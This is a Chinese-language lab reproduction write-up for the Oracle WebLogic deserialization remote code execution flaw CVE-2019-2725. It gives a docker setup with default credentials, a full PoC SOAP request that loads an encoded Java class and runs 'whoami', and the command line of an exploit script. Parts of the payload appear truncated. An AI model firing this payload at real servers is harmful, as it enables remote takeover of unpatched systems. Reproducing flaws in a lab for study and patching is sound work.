Weblogic反序列化远程代码执⾏漏洞(CVE-2019-2725)复
现
简介
WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间件,WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。
影响版本
Oracle WebLogic Server 10.*
Oracle WebLogic Server 12.1.3
环境搭建
这⾥使⽤docker来搭建
拉取镜像并运⾏
docker pull ismaleiva90/weblogic12
docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
User: weblogic
Pass: welcome1
漏洞复现
Poc
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:49163
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: text/xml
Content-Length: 4405
<soapenv:Envelope xmlns:soapenv="/soap/envelope/" xmlns:wsa="/2005/08/addressing" xmlns:asy="www.bea <java>
<class><string>EventData</string>
<void>
<string>
<java>
<void class="sun.misc.BASE64Decoder">
<void method="decodeBuffer" id="byte_arr"> <string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBw </void>
</void>
<void class="illa.classfile.DefiningClassLoader">
<void method="defineClass">
<string>ResultBaseExec</string>
<object idref="byte_arr"></object>
<void method="newInstance">
<void method="do_exec" id="result">
<string>whoami</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork" id="current_work">
<void method="getClass">
<void method="getDeclaredField">
<string>connectionHandler</string>
<void method="setAccessible"><boolean>true</boolean></void>
<void method="get">
<void method="get">
<object idref="current_work"></object>
<void method="getServletRequest">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object class="l.util.StringInputStream"><object idref="result"></object></object> </void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</void>
</void>
</void>
</void>
</java>
</string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
构建数据包发送
脚本地址:
github/TopScrew/CVE-2019-2725.git
python3 CVE-2019-2725.py 12.1.3 127.0.0.1:49163 id
cve漏洞库成功执⾏
修复建议升级到安全版本
发表评论